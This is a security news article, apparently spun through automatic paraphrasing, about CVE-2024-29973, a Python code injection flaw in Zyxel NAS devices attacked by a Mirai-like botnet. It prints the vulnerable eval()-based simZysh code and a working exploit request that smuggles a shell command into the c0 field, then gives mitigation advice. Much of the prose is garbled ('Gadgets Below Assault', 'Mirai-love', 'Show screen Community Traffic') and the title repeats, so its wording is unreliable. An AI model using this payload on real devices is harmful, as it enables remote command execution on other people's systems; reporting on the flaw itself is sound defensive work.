Zyxel NAS Devices Under Attack: Mirai-Like Botnet Exploiting CVE-2024-29973

by Esmeralda McKenzie
Zyxel NAS Devices Under Attack: Mirai-Like Botnet Exploiting CVE-2024-29973

Zyxel NAS Devices Under Attack: Mirai-Like Botnet Exploiting CVE-2024-29973

Zyxel NAS Gadgets Below Assault: Mirai-Like Botnet Exploiting CVE-2024-29973

A novel vulnerability, CVE-2024-29973, has been repeat in Zyxel NAS gadgets, exposing them to assaults from a Mirai-love botnet.

This vulnerability, a Python code injection flaw, has raised valuable considerations among cybersecurity consultants and customers alike.

Per the Outpost24 weblog, the vulnerability stems from a flaw in the simZysh endpoint of the Zyxel NAS gadgets’ web server.

This endpoint, launched all over a patch for a previous vulnerability (CVE-2023-27992), inadvertently replicated the same safety mistakes.

The core field lies in the state of the eval() arrangement, which is infamous for its doable to form arbitrary code if no longer effectively sanitized.

A contemporary tweet from Shadowserver Foundation shared that the NAS Gadgets from Zyxel are being attacked by a botnet akin to Mirai and exploits CVE-2024-29973.

CVE-2024-29973 – Vulnerability Vital aspects

The simZysh arrangement in the Zyxel NAS gadgets’ Python web server is designed to simulate the output of zyshcgi.

Nonetheless, the arrangement’s implementation contains several valuable flaws:

class mainApplication(object):

# Snip...      def simZysh(self, *url_args, **request_args):          """Simulate zyshcgi's output. GUI's broker shall set command as the following format:                          'controller_name action_name {"arg1": value, "arg2": value, ...}'                  """          for i in url_args:              if not check_str_format(i, 'url'):                  return tools_cherrypy.ARG_ERROR          for key, value in request_args.items():              if not check_str_format(key, 'request'):                  if not check_list(key):                      return tools_cherrypy.ARG_ERROR              if not check_str_format(value, 'request'):                  if not check_list(value):                      return tools_cherrypy.ARG_ERROR          r_value = {}          c_index = 0          while True:              c_key = 'c%d' % c_index              if request_args.has_key(c_key):                  controller_n, action_n, args = request_args[c_key].split(' ', 2)                  try:                      controller = __import__('controllers.%s' % controller_n)                      tmp_result = eval('controller.%s.%s(cherrypy=%s, arguments=%s)' % (                       controller_n, action_n, 'cherrypy', args))                      if not tmp_result:                          raise ValueError                      r_type = type(tmp_result)                      if r_type == list:                          r_value['zyshdata%d' % c_index] = tmp_result                      else:                          r_value['zyshdata%d' % c_index] = [                           tmp_result]                      r_value['errno%d' % c_index] = 0                      r_value['errmsg%d' % c_index] = _('OK')                  except:                      r_value['zyshdata%d' % c_index] = []                      r_value['errno%d' % c_index] = -99999                      r_value['errmsg%d' % c_index] = _('Execute Error')              else:                  break              c_index += 1          return r_value      simZysh.exposed = True 

Exploitation and Affect

The vulnerability permits attackers to inject arbitrary Python code by plot of fastidiously crafted requests.

Attackers can form instructions on the tool by bypassing the mod_auth_zyxel module and avoiding Python filters. As an illustration, a malicious payload could per chance maybe query love this:

POST /cmd,/simZysh/register_main/setCookie

c0='storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("makekey", shell=True)#'

This payload exploits the eval() arrangement to form the makekey sing, doubtlessly opening a backdoor on the tool.

Mitigation and Strategies

Zyxel has been notified of the vulnerability and released patches.

For the time being, customers are urged to:

  1. Disable Some distance away Access: Restrict a ways off entry to the NAS gadgets to prevent exploitation.
  2. Apply Community Segmentation: Isolate NAS gadgets from the rest of the community to limit doable afflict.
  3. Show screen Community Traffic: Show screen irregular community job indicating an ongoing assault.

The invention of CVE-2024-29973 highlights the ongoing challenges in securing IoT gadgets.

As attackers proceed to exploit such vulnerabilities, it would be most valuable for producers to implement strong safety measures and for customers to defend vigilant.

Source credit : cybersecuritynews.com

Related Posts